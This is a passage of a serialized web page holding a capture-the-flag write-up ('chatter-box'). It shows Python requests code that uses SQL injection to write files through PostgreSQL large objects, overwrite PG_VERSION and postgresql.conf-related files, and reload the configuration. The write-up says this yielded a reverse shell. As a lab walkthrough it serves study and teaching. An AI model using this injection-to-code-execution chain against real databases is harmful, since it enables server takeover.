'/etc/postgresql/13/main/postgresql.conf'))\"",{"type":32,"tag":83,"props":3444,"children":3445},{"style":433},[3446],{"type":38,"value":798},{"type":32,"tag":83,"props":3448,"children":3449},{"class":85,"line":183},[3450,3454,3458,3462,3466,3470,3474,3478,3482,3486,3490,3494,3498,3502,3506,3510,3514,3518,3522,3526,3530,3534,3538,3542],{"type":32,"tag":83,"props":3451,"children":3452},{"style":96},[3453],{"type":38,"value":3297},{"type":32,"tag":83,"props":3455,"children":3456},{"style":433},[3457],{"type":38,"value":607},{"type":32,"tag":83,"props":3459,"children":3460},{"style":96},[3461],{"type":38,"value":3306},{"type":32,"tag":83,"props":3463,"children":3464},{"style":433},[3465],{"type":38,"value":629},{"type":32,"tag":83,"props":3467,"children":3468},{"style":96},[3469],{"type":38,"value":3315},{"type":32,"tag":83,"props":3471,"children":3472},{"style":433},[3473],{"type":38,"value":584},{"type":32,"tag":83,"props":3475,"children":3476},{"style":651},[3477],{"type":38,"value":3324},{"type":32,"tag":83,"props":3479,"children":3480},{"style":433},[3481],{"type":38,"value":728},{"type":32,"tag":83,"props":3483,"children":3484},{"style":427},[3485],{"type":38,"value":3333},{"type":32,"tag":83,"props":3487,"children":3488},{"style":433},[3489],{"type":38,"value":607},{"type":32,"tag":83,"props":3491,"children":3492},{"style":439},[3493],{"type":38,"value":452},{"type":32,"tag":83,"props":3495,"children":3496},{"style":338},[3497],{"type":38,"value":3346},{"type":32,"tag":83,"props":3499,"children":3500},{"style":439},[3501],{"type":38,"value":452},{"type":32,"tag":83,"props":3503,"children":3504},{"style":455},[3505],{"type":38,"value":468},{"type":32,"tag":83,"props":3507,"children":3508},{"style":96},[3509],{"type":38,"value":589},{"type":32,"tag":83,"props":3511,"children":3512},{"style":455},[3513],{"type":38,"value":468},{"type":32,"tag":83,"props":3515,"children":3516},{"style":439},[3517],{"type":38,"value":452},{"type":32,"tag":83,"props":3519,"children":3520},{"style":338},[3521],{"type":38,"value":3371},{"type":32,"tag":83,"props":3523,"children":3524},{"style":439},[3525],{"type":38,"value":452},{"type":32,"tag":83,"props":3527,"children":3528},{"style":433},[3529],{"type":38,"value":728},{"type":32,"tag":83,"props":3531,"children":3532},{"style":427},[3533],{"type":38,"value":3384},{"type":32,"tag":83,"props":3535,"children":3536},{"style":433},[3537],{"type":38,"value":607},{"type":32,"tag":83,"props":3539,"children":3540},{"style":96},[3541],{"type":38,"value":3393},{"type":32,"tag":83,"props":3543,"children":3544},{"style":433},[3545],{"type":38,"value":798},{"type":32,"tag":364,"props":3547,"children":3548},{},[3549],{"type":32,"tag":368,"props":3550,"children":3551},{},[3552],{"type":38,"value":3553},"Replace the PG_VERSION file with our key:",{"type":32,"tag":68,"props":3555,"children":3556},{"lang":556},[3557],{"type":32,"tag":73,"props":3558,"children":3560},{"code":3559,"language":556,"meta":7,"className":561,"style":7},"rand_num = rand_num + 1\nwith open(\"files/cert.b64\", \"r\") as f:\n    cert = f.read()\n\nquery = get_payload(f\"(SELECT lo_from_bytea({rand_num}, decode('{cert}', 'base64')))\")\nr = requests.post(URL_TARGET, data=\"username=\"+query+\"&passwd=admin\", headers=headers)\nquery = get_payload(f\"(SELECT lo_export({rand_num}, '/var/lib/postgresql/13/main/PG_VERSION'))\")\nr = requests.post(URL_TARGET, data=\"username=\"+query+\"&passwd=admin\", headers=headers)\n",[3561],{"type":32,"tag":79,"props":3562,"children":3563},{"__ignoreMap":7},[3564,3589,3649,3677,3684,3748,3847,3895],{"type":32,"tag":83,"props":3565,"children":3566},{"class":85,"line":86},[3567,3571,3575,3580,3584],{"type":32,"tag":83,"props":3568,"children":3569},{"style":96},[3570],{"type":38,"value":3061},{"type":32,"tag":83,"props":3572,"children":3573},{"style":433},[3574],{"type":38,"value":607},{"type":32,"tag":83,"props":3576,"children":3577},{"style":96},[3578],{"type":38,"value":3579}," rand_num ",{"type":32,"tag":83,"props":3581,"children":3582},{"style":455},[3583],{"type":38,"value":468},{"type":32,"tag":83,"props":3585,"children":3586},{"style":720},[3587],{"type":38,"value":3588}," 1\n",{"type":32,"tag":83,"props":3590,"children":3591},{"class":85,"line":102},[3592,3596,3600,3604,3608,3613,3617,3621,3625,3629,3633,3637,3641,3645],{"type":32,"tag":83,"props":3593,"children":3594},{"style":90},[3595],{"type":38,"value":3127},{"type":32,"tag":83,"props":3597,"children":3598},{"style":657},[3599],{"type":38,"value":3132},{"type":32,"tag":83,"props":3601,"children":3602},{"style":433},[3603],{"type":38,"value":584},{"type":32,"tag":83,"props":3605,"children":3606},{"style":439},[3607],{"type":38,"value":452},{"type":32,"tag":83,"props":3609,"children":3610},{"style":338},[3611],{"type":38,"value":3612},"files/cert.b64",{"type":32,"tag":83,"props":3614,"children":3615},{"style":439},[3616],{"type":38,"value":452},{"type":32,"tag":83,"props":3618,"children":3619},{"style":433},[3620],{"type":38,"value":728},{"type":32,"tag":83,"props":3622,"children":3623},{"style":439},[3624],{"type":38,"value":442},{"type":32,"tag":83,"props":3626,"children":3627},{"style":338},[3628],{"type":38,"value":3162},{"type":32,"tag":83,"props":3630,"children":3631},{"style":439},[3632],{"type":38,"value":452},{"type":32,"tag":83,"props":3634,"children":3635},{"style":433},[3636],{"type":38,"value":869},{"type":32,"tag":83,"props":3638,"children":3639},{"style":90},[3640],{"type":38,"value":3175},{"type":32,"tag":83,"props":3642,"children":3643},{"style":96},[3644],{"type":38,"value":2891},{"type":32,"tag":83,"props":3646,"children":3647},{"style":433},[3648],{"type":38,"value":3184},{"type":32,"tag":83,"props":3650,"children":3651},{"class":85,"line":112},[3652,3657,3661,3665,3669,3673],{"type":32,"tag":83,"props":3653,"children":3654},{"style":96},[3655],{"type":38,"value":3656},"    cert ",{"type":32,"tag":83,"props":3658,"children":3659},{"style":433},[3660],{"type":38,"value":607},{"type":32,"tag":83,"props":3662,"children":3663},{"style":96},[3664],{"type":38,"value":2891},{"type":32,"tag":83,"props":3666,"children":3667},{"style":433},[3668],{"type":38,"value":629},{"type":32,"tag":83,"props":3670,"children":3671},{"style":96},[3672],{"type":38,"value":3209},{"type":32,"tag":83,"props":3674,"children":3675},{"style":433},[3676],{"type":38,"value":3214},{"type":32,"tag":83,"props":3678,"children":3679},{"class":85,"line":126},[3680],{"type":32,"tag":83,"props":3681,"children":3682},{"emptyLinePlaceholder":106},[3683],{"type":38,"value":109},{"type":32,"tag":83,"props":3685,"children":3686},{"class":85,"line":135},[3687,3691,3695,3699,3703,3707,3711,3715,3719,3723,3727,3731,3736,3740,3744],{"type":32,"tag":83,"props":3688,"children":3689},{"style":96},[3690],{"type":38,"value":3229},{"type":32,"tag":83,"props":3692,"children":3693},{"style":433},[3694],{"type":38,"value":607},{"type":32,"tag":83,"props":3696,"children":3697},{"style":96},[3698],{"type":38,"value":579},{"type":32,"tag":83,"props":3700,"children":3701},{"style":433},[3702],{"type":38,"value":584},{"type":32,"tag":83,"props":3704,"children":3705},{"style":455},[3706],{"type":38,"value":643},{"type":32,"tag":83,"props":3708,"children":3709},{"style":338},[3710],{"type":38,"value":3250},{"type":32,"tag":83,"props":3712,"children":3713},{"style":651},[3714],{"type":38,"value":654},{"type":32,"tag":83,"props":3716,"children":3717},{"style":96},[3718],{"type":38,"value":3259},{"type":32,"tag":83,"props":3720,"children":3721},{"style":651},[3722],{"type":38,"value":688},{"type":32,"tag":83,"props":3724,"children":3725},{"style":338},[3726],{"type":38,"value":3268},{"type":32,"tag":83,"props":3728,"children":3729},{"style":651},[3730],{"type":38,"value":654},{"type":32,"tag":83,"props":3732,"children":3733},{"style":96},[3734],{"type":38,"value":3735},"cert",{"type":32,"tag":83,"props":3737,"children":3738},{"style":651},[3739],{"type":38,"value":688},{"type":32,"tag":83,"props":3741,"children":3742},{"style":338},[3743],{"type":38,"value":3285},{"type":32,"tag":83,"props":3745,"children":3746},{"style":433},[3747],{"type":38,"value":798},{"type":32,"tag":83,"props":3749,"children":3750},{"class":85,"line":148},[3751,3755,3759,3763,3767,3771,3775,3779,3783,3787,3791,3795,3799,3803,3807,3811,3815,3819,3823,3827,3831,3835,3839,3843],{"type":32,"tag":83,"props":3752,"children":3753},{"style":96},[3754],{"type":38,"value":3297},{"type":32,"tag":83,"props":3756,"children":3757},{"style":433},[3758],{"type":38,"value":607},{"type":32,"tag":83,"props":3760,"children":3761},{"style":96},[3762],{"type":38,"value":3306},{"type":32,"tag":83,"props":3764,"children":3765},{"style":433},[3766],{"type":38,"value":629},{"type":32,"tag":83,"props":3768,"children":3769},{"style":96},[3770],{"type":38,"value":3315},{"type":32,"tag":83,"props":3772,"children":3773},{"style":433},[3774],{"type":38,"value":584},{"type":32,"tag":83,"props":3776,"children":3777},{"style":651},[3778],{"type":38,"value":3324},{"type":32,"tag":83,"props":3780,"children":3781},{"style":433},[3782],{"type":38,"value":728},{"type":32,"tag":83,"props":3784,"children":3785},{"style":427},[3786],{"type":38,"value":3333},{"type":32,"tag":83,"props":3788,"children":3789},{"style":433},[3790],{"type":38,"value":607},{"type":32,"tag":83,"props":3792,"children":3793},{"style":439},[3794],{"type":38,"value":452},{"type":32,"tag":83,"props":3796,"children":3797},{"style":338},[3798],{"type":38,"value":3346},{"type":32,"tag":83,"props":3800,"children":3801},{"style":439},[3802],{"type":38,"value":452},{"type":32,"tag":83,"props":3804,"children":3805},{"style":455},[3806],{"type":38,"value":468},{"type":32,"tag":83,"props":3808,"children":3809},{"style":96},[3810],{"type":38,"value":589},{"type":32,"tag":83,"props":3812,"children":3813},{"style":455},[3814],{"type":38,"value":468},{"type":32,"tag":83,"props":3816,"children":3817},{"style":439},[3818],{"type":38,"value":452},{"type":32,"tag":83,"props":3820,"children":3821},{"style":338},[3822],{"type":38,"value":3371},{"type":32,"tag":83,"props":3824,"children":3825},{"style":439},[3826],{"type":38,"value":452},{"type":32,"tag":83,"props":3828,"children":3829},{"style":433},[3830],{"type":38,"value":728},{"type":32,"tag":83,"props":3832,"children":3833},{"style":427},[3834],{"type":38,"value":3384},{"type":32,"tag":83,"props":3836,"children":3837},{"style":433},[3838],{"type":38,"value":607},{"type":32,"tag":83,"props":3840,"children":3841},{"style":96},[3842],{"type":38,"value":3393},{"type":32,"tag":83,"props":3844,"children":3845},{"style":433},[3846],{"type":38,"value":798},{"type":32,"tag":83,"props":3848,"children":3849},{"class":85,"line":161},[3850,3854,3858,3862,3866,3870,3874,3878,3882,3886,3891],{"type":32,"tag":83,"props":3851,"children":3852},{"style":96},[3853],{"type":38,"value":3229},{"type":32,"tag":83,"props":3855,"children":3856},{"style":433},[3857],{"type":38,"value":607},{"type":32,"tag":83,"props":3859,"children":3860},{"style":96},[3861],{"type":38,"value":579},{"type":32,"tag":83,"props":3863,"children":3864},{"style":433},[3865],{"type":38,"value":584},{"type":32,"tag":83,"props":3867,"children":3868},{"style":455},[3869],{"type":38,"value":643},{"type":32,"tag":83,"props":3871,"children":3872},{"style":338},[3873],{"type":38,"value":3425},{"type":32,"tag":83,"props":3875,"children":3876},{"style":651},[3877],{"type":38,"value":654},{"type":32,"tag":83,"props":3879,"children":3880},{"style":96},[3881],{"type":38,"value":3259},{"type":32,"tag":83,"props":3883,"children":3884},{"style":651},[3885],{"type":38,"value":688},{"type":32,"tag":83,"props":3887,"children":3888},{"style":338},[3889],{"type":38,"value":3890},", '/var/lib/postgresql/13/main/PG_VERSION'))\"",{"type":32,"tag":83,"props":3892,"children":3893},{"style":433},[3894],{"type":38,"value":798},{"type":32,"tag":83,"props":3896,"children":3897},{"class":85,"line":169},[3898,3902,3906,3910,3914,3918,3922,3926,3930,3934,3938,3942,3946,3950,3954,3958,3962,3966,3970,3974,3978,3982,3986,3990],{"type":32,"tag":83,"props":3899,"children":3900},{"style":96},[3901],{"type":38,"value":3297},{"type":32,"tag":83,"props":3903,"children":3904},{"style":433},[3905],{"type":38,"value":607},{"type":32,"tag":83,"props":3907,"children":3908},{"style":96},[3909],{"type":38,"value":3306},{"type":32,"tag":83,"props":3911,"children":3912},{"style":433},[3913],{"type":38,"value":629},{"type":32,"tag":83,"props":3915,"children":3916},{"style":96},[3917],{"type":38,"value":3315},{"type":32,"tag":83,"props":3919,"children":3920},{"style":433},[3921],{"type":38,"value":584},{"type":32,"tag":83,"props":3923,"children":3924},{"style":651},[3925],{"type":38,"value":3324},{"type":32,"tag":83,"props":3927,"children":3928},{"style":433},[3929],{"type":38,"value":728},{"type":32,"tag":83,"props":3931,"children":3932},{"style":427},[3933],{"type":38,"value":3333},{"type":32,"tag":83,"props":3935,"children":3936},{"style":433},[3937],{"type":38,"value":607},{"type":32,"tag":83,"props":3939,"children":3940},{"style":439},[3941],{"type":38,"value":452},{"type":32,"tag":83,"props":3943,"children":3944},{"style":338},[3945],{"type":38,"value":3346},{"type":32,"tag":83,"props":3947,"children":3948},{"style":439},[3949],{"type":38,"value":452},{"type":32,"tag":83,"props":3951,"children":3952},{"style":455},[3953],{"type":38,"value":468},{"type":32,"tag":83,"props":3955,"children":3956},{"style":96},[3957],{"type":38,"value":589},{"type":32,"tag":83,"props":3959,"children":3960},{"style":455},[3961],{"type":38,"value":468},{"type":32,"tag":83,"props":3963,"children":3964},{"style":439},[3965],{"type":38,"value":452},{"type":32,"tag":83,"props":3967,"children":3968},{"style":338},[3969],{"type":38,"value":3371},{"type":32,"tag":83,"props":3971,"children":3972},{"style":439},[3973],{"type":38,"value":452},{"type":32,"tag":83,"props":3975,"children":3976},{"style":433},[3977],{"type":38,"value":728},{"type":32,"tag":83,"props":3979,"children":3980},{"style":427},[3981],{"type":38,"value":3384},{"type":32,"tag":83,"props":3983,"children":3984},{"style":433},[3985],{"type":38,"value":607},{"type":32,"tag":83,"props":3987,"children":3988},{"style":96},[3989],{"type":38,"value":3393},{"type":32,"tag":83,"props":3991,"children":3992},{"style":433},[3993],{"type":38,"value":798},{"type":32,"tag":364,"props":3995,"children":3996},{},[3997],{"type":32,"tag":368,"props":3998,"children":3999},{},[4000],{"type":38,"value":4001},"Reload the postgresql configuration:",{"type":32,"tag":68,"props":4003,"children":4004},{"lang":556},[4005],{"type":32,"tag":73,"props":4006,"children":4008},{"code":4007,"language":556,"meta":7,"className":561,"style":7},"query = get_payload(f\"SELECT pg_reload_conf()\")\nr = requests.post(URL_TARGET, data=\"username=\"+query+\"&passwd=admin\", headers=headers)\n",[4009],{"type":32,"tag":79,"props":4010,"children":4011},{"__ignoreMap":7},[4012,4044],{"type":32,"tag":83,"props":4013,"children":4014},{"class":85,"line":86},[4015,4019,4023,4027,4031,4035,4040],{"type":32,"tag":83,"props":4016,"children":4017},{"style":96},[4018],{"type":38,"value":3229},{"type":32,"tag":83,"props":4020,"children":4021},{"style":433},[4022],{"type":38,"value":607},{"type":32,"tag":83,"props":4024,"children":4025},{"style":96},[4026],{"type":38,"value":579},{"type":32,"tag":83,"props":4028,"children":4029},{"style":433},[4030],{"type":38,"value":584},{"type":32,"tag":83,"props":4032,"children":4033},{"style":455},[4034],{"type":38,"value":643},{"type":32,"tag":83,"props":4036,"children":4037},{"style":338},[4038],{"type":38,"value":4039},"\"SELECT pg_reload_conf()\"",{"type":32,"tag":83,"props":4041,"children":4042},{"style":433},[4043],{"type":38,"value":798},{"type":32,"tag":83,"props":4045,"children":4046},{"class":85,"line":102},[4047,4051,4055,4059,4063,4067,4071,4075,4079,4083,4087,4091,4095,4099,4103,4107,4111,4115,4119,4123,4127,4131,4135,4139],{"type":32,"tag":83,"props":4048,"children":4049},{"style":96},[4050],{"type":38,"value":3297},{"type":32,"tag":83,"props":4052,"children":4053},{"style":433},[4054],{"type":38,"value":607},{"type":32,"tag":83,"props":4056,"children":4057},{"style":96},[4058],{"type":38,"value":3306},{"type":32,"tag":83,"props":4060,"children":4061},{"style":433},[4062],{"type":38,"value":629},{"type":32,"tag":83,"props":4064,"children":4065},{"style":96},[4066],{"type":38,"value":3315},{"type":32,"tag":83,"props":4068,"children":4069},{"style":433},[4070],{"type":38,"value":584},{"type":32,"tag":83,"props":4072,"children":4073},{"style":651},[4074],{"type":38,"value":3324},{"type":32,"tag":83,"props":4076,"children":4077},{"style":433},[4078],{"type":38,"value":728},{"type":32,"tag":83,"props":4080,"children":4081},{"style":427},[4082],{"type":38,"value":3333},{"type":32,"tag":83,"props":4084,"children":4085},{"style":433},[4086],{"type":38,"value":607},{"type":32,"tag":83,"props":4088,"children":4089},{"style":439},[4090],{"type":38,"value":452},{"type":32,"tag":83,"props":4092,"children":4093},{"style":338},[4094],{"type":38,"value":3346},{"type":32,"tag":83,"props":4096,"children":4097},{"style":439},[4098],{"type":38,"value":452},{"type":32,"tag":83,"props":4100,"children":4101},{"style":455},[4102],{"type":38,"value":468},{"type":32,"tag":83,"props":4104,"children":4105},{"style":96},[4106],{"type":38,"value":589},{"type":32,"tag":83,"props":4108,"children":4109},{"style":455},[4110],{"type":38,"value":468},{"type":32,"tag":83,"props":4112,"children":4113},{"style":439},[4114],{"type":38,"value":452},{"type":32,"tag":83,"props":4116,"children":4117},{"style":338},[4118],{"type":38,"value":3371},{"type":32,"tag":83,"props":4120,"children":4121},{"style":439},[4122],{"type":38,"value":452},{"type":32,"tag":83,"props":4124,"children":4125},{"style":433},[4126],{"type":38,"value":728},{"type":32,"tag":83,"props":4128,"children":4129},{"style":427},[4130],{"type":38,"value":3384},{"type":32,"tag":83,"props":4132,"children":4133},{"style":433},[4134],{"type":38,"value":607},{"type":32,"tag":83,"props":4136,"children":4137},{"style":96},[4138],{"type":38,"value":3393},{"type":32,"tag":83,"props":4140,"children":4141},{"style":433},[4142],{"type":38,"value":798},{"type":32,"tag":47,"props":4144,"children":4145},{},[4146,4148,4154,4156,4162],{"type":38,"value":4147},"Note that the ",{"type":32,"tag":79,"props":4149,"children":4151},{"className":4150},[],[4152],{"type":38,"value":4153},"get_payload()",{"type":38,"value":4155}," function allows us to generate our sqli payload as seen previously in ",{"type":32,"tag":2436,"props":4157,"children":4159},{"href":4158},"#sql-injection",[4160],{"type":38,"value":4161},"part 3",{"type":38,"value":629},{"type":32,"tag":47,"props":4164,"children":4165},{},[4166],{"type":38,"value":4167},"After reloading the configuration we can see that the reverse shell has been executed well allowing us to obtain the flag.",{"type":32,"tag":57,"props":4169,"children":4171},{"imgSrc":4170},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1706559298/writeups/chatter-box/rev_shell.webp",[],{"type":32,"tag":4173,"props":4174,"children":4175},"style",{},[4176],{"type":38,"value":4177},"html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}",{"title":7,"searchDepth":102,"depth":86,"links":4179},[4180,4181,4182,4183,4184],{"id":42,"depth":102,"text":45},{"id":349,"depth":102,"text":352},{"id":396,"depth":102,"text":399},{"id":2611,"depth":102,"text":2614},{"id":3027,"depth":102,"text":3030},"markdown","content:writeups:chatter-box.md","content","writeups/chatter-box.md","writeups/chatter-box","md",1749027224524]